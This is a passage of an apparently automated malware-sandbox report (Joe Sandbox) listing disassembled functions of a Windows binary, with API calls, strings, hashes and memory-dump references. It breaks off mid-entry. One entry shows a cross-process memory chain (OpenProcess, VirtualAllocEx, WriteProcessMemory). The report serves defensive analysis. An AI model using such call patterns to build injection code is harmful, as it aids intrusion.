                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper$__itow__swprintf
                                    • String ID: REMOVE$THIS
                                    • API String ID: 3797816924-776492005
                                    • Opcode ID: 9cd3a0ad04ed6958668a2f02862ba303dc1a2f1addb4f951d348653d4cea03c8
                                    • Instruction ID: fba7337df8ed47562defd583b5c5f69e89a848284735ad7f5621db2d7529b4a5
                                    • Opcode Fuzzy Hash: 9cd3a0ad04ed6958668a2f02862ba303dc1a2f1addb4f951d348653d4cea03c8
                                    • Instruction Fuzzy Hash: 64419274A002599FCF08EFA4C881AADB7F5FF59314F14C069E91AAB2A2DB34DD45CB50
                                    Function 0016C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0017430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0016BC08,?,?,00000034,00000800,?,00000034), ref: 00174335
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0016C1D3
                                      • Part of subcall function 001742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0016BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00174300
                                      • Part of subcall function 0017422F: GetWindowThreadProcessId.USER32(?,?), ref: 0017425A
                                      • Part of subcall function 0017422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0016BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0017426A
                                      • Part of subcall function 0017422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0016BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00174280
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0016C240
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0016C28D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 0ae7377968a0e591407a13249e8ae8507682fb67457b2f7615ea132fe4fdda5e
                                    • Instruction ID: 1cfc8bbf6c9ed8d0d9a16db85d2b97c303dc0b0b0815415270ab40860d5a843f
                                    • Opcode Fuzzy Hash: 0ae7377968a0e591407a13249e8ae8507682fb67457b2f7615ea132fe4fdda5e
                                    • Instruction Fuzzy Hash: 77414F72900218AFDB10DFA4DC91AEEB778FF19700F004099FA85B7181DB716E95CBA1
                                    Function 0019A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001CDC00,00000000,?,?,?,?), ref: 0019A6D8
                                    • GetWindowLongW.USER32 ref: 0019A6F5
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0019A705
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: fdaa0bc902549ddf71c623d9f109204f6edf75758b07136a0fda8135f33f2652
                                    • Instruction ID: cc8057280c21dd73622abe8284318398bf131c1c67f669925ed323fce56e7849
                                    • Opcode Fuzzy Hash: fdaa0bc902549ddf71c623d9f109204f6edf75758b07136a0fda8135f33f2652
                                    • Instruction Fuzzy Hash: 8131DC3120020AABDF258F78DC41BEA7BA9FF49324F254728F875932E0D771E8548B90
                                    Function 0019A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0019A15E
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0019A172
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0019A196
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 2f52b0ce8eca06f60fd846a1a4881adf4f702df07447777c34c9b5756d243a42
                                    • Instruction ID: fcd5dbaf3e7e5b045bb81383675e06278012fbd7b742610aae11649f5b783c5e
                                    • Opcode Fuzzy Hash: 2f52b0ce8eca06f60fd846a1a4881adf4f702df07447777c34c9b5756d243a42
                                    • Instruction Fuzzy Hash: EE217F32510218ABDF158F94CC42FEA3BB9EF48754F110224FE55AB1D0D7B5AC55CB90
                                    Function 0019A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0019A941
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0019A94F
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0019A956
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: d4c7b255cc18d78316f56d44ab6c1a358060217b95b329f361923cf8803ce56d
                                    • Instruction ID: d9983e38a1af3770873d6082cd220a8ffbe51a65493c485fdcff3df13890a987
                                    • Opcode Fuzzy Hash: d4c7b255cc18d78316f56d44ab6c1a358060217b95b329f361923cf8803ce56d
                                    • Instruction Fuzzy Hash: 05219DB5600209BFDB10DF28DC81DB737ADEF5A3A8B450159FA049B2A1DB70EC55CBA1
                                    Function 001999A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00199A30
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00199A40
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00199A65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 018f7a93307ac83f6e352aa5fb52472a99da9ed5377c08394b99303df40d0987
                                    • Instruction ID: 1dddac5d4eb76108b69ee785959eac4c9d3e6a7a46dcbfcd6a289820ce66a898
                                    • Opcode Fuzzy Hash: 018f7a93307ac83f6e352aa5fb52472a99da9ed5377c08394b99303df40d0987
                                    • Instruction Fuzzy Hash: 93219F72610118BFDF258F58DC85FBF3BAAEF89764F018129F9549B1A0C771AC5287A0
                                    Function 0019A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0019A46D
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0019A482
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0019A48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 429d4cdf2356667f9f48dc211458921d53c6d998e04b689aa72147b0cd863e0e
                                    • Instruction ID: 90f740316ce88eadd87cddd0e324f664d786008f0ddecb20b658f828d8f33342
                                    • Opcode Fuzzy Hash: 429d4cdf2356667f9f48dc211458921d53c6d998e04b689aa72147b0cd863e0e
                                    • Instruction Fuzzy Hash: 6F110A71200208BEEF245F65CC45FAB3769FF88B54F064118FA4597091D3B2E811C760
                                    Function 00152287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 001522A1
                                    • GetProcAddress.KERNEL32(00000000), ref: 001522A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 2574300362-340411864
                                    • Opcode ID: ba0009afa94f4550dd8a71fcf8c9d3f5bff8637014def3cd9564df6880a025dc
                                    • Instruction ID: f05f580a55b9436396df90e7c91e95e9805dc8578eaee37b91de3ba41bea3935
                                    • Opcode Fuzzy Hash: ba0009afa94f4550dd8a71fcf8c9d3f5bff8637014def3cd9564df6880a025dc
                                    • Instruction Fuzzy Hash: ABE04F74698301ABDB155FB0FC8DB683765BB05702F504460F102EA8E0EBB594C4CF04
                                    Function 0015235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00152276), ref: 00152376
                                    • GetProcAddress.KERNEL32(00000000), ref: 0015237D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 2574300362-2819208100
                                    • Opcode ID: 5d9a7248c8a0b96bc69976dc8731280340b51edc84f53522b42b53435f51dedc
                                    • Instruction ID: 0dd296ec52e3a07c74e1d3df0ee4529c0b1557ce2f8b3b435f7fb25370e274be
                                    • Opcode Fuzzy Hash: 5d9a7248c8a0b96bc69976dc8731280340b51edc84f53522b42b53435f51dedc
                                    • Instruction Fuzzy Hash: 1EE0EC74688300EFDB666F60FD4DB243A65BB0A702F120464F509E68B1DBB894D4CB14
                                    Function 001AAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 82e77fcb5a4ac52b72151e6fb1db163f1627f331b7e007e79d923d159f7ac42c
                                    • Instruction ID: 9b667d15c560c3fcca112acd6d72c4114a781917cafb3fe69f458e1a1f0642bc
                                    • Opcode Fuzzy Hash: 82e77fcb5a4ac52b72151e6fb1db163f1627f331b7e007e79d923d159f7ac42c
                                    • Instruction Fuzzy Hash: D1E0C271804658EBDB099B40DD04DF973BCAF09311F9100D2B906E1008E3308B88EA13
                                    Function 0014E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0014E014,75570AE0,0014DEF1,001CDC38,?,?), ref: 0014E02C
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0014E03E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 2e08b096730bcb46e45cd2053ab884fe4cad2054302b9df3726ad0e041ff75d7
                                    • Instruction ID: aaa5d55ad52eb5e081723c3a821dfc5cb172d46fbf16e5a600baf0c1b19ca346
                                    • Opcode Fuzzy Hash: 2e08b096730bcb46e45cd2053ab884fe4cad2054302b9df3726ad0e041ff75d7
                                    • Instruction Fuzzy Hash: F2D0A730500B229FC7354F65FC0861676DCBF00700F184439F491D3560EBF8C8C08650
                                    Function 00192205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,001921FB,?,001923EF), ref: 00192213
                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00192225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetProcessId$kernel32.dll
                                    • API String ID: 2574300362-399901964
                                    • Opcode ID: 61f02d7bae1675e370acb7898370e6552ff2262be9e39a9875632b36c4f5d663
                                    • Instruction ID: 8187993ebb3f8e81a4c9a1e983ac1cb8ffae0d83b5fffe2f007872be5c03586d
                                    • Opcode Fuzzy Hash: 61f02d7bae1675e370acb7898370e6552ff2262be9e39a9875632b36c4f5d663
                                    • Instruction Fuzzy Hash: B4D0A734400B12AFCB294F36FC0860576D8EF06700B004429E841E2650EB70D8C08650
                                    Function 001342F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001342EC,?,001342AA,?), ref: 00134304
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00134316
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 6c8c43b580cf8b28ba8c7021f657cb50fea0c72d3cbbc514aad1003d2e7519df
                                    • Instruction ID: 54e1ff5c3f03d9844b2d17ec2097ca8f98f74a48770f5525c87ed67049870cbc
                                    • Opcode Fuzzy Hash: 6c8c43b580cf8b28ba8c7021f657cb50fea0c72d3cbbc514aad1003d2e7519df
                                    • Instruction Fuzzy Hash: 66D0A730400B229FC7245F65FC0C60576E8BB04701F004429E451D3561EBB4D8C08610
                                    Function 0013434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,001341BB,00134341,?,0013422F,?,001341BB,?,?,?,?,001339FE,?,00000001), ref: 00134359
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013436B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 011b53e85382a833278c4c1f994071eb8f70e1b661be7a3a2e039fe9da380f0e
                                    • Instruction ID: 4f3e56c119fd30a0baa4af7fc1e63cf5d0e37b7a4474ba763756a86b62bdf082
                                    • Opcode Fuzzy Hash: 011b53e85382a833278c4c1f994071eb8f70e1b661be7a3a2e039fe9da380f0e
                                    • Instruction Fuzzy Hash: AFD0A730400B229FC7248F35FC086057AD8BB10715F004529E4D1D3550EBB4E8C08610
                                    Function 00170539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0017051D,?,001705FE), ref: 00170547
                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00170559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1071820185
                                    • Opcode ID: 1a149abc8b9a6f92a72b2ee17852a452748f5537d8fbd20dc9042b3b3b4e9939
                                    • Instruction ID: de7179240accafeab051b23d782071b7d83e2c527b1a3b2c6045481f78b4f4d5
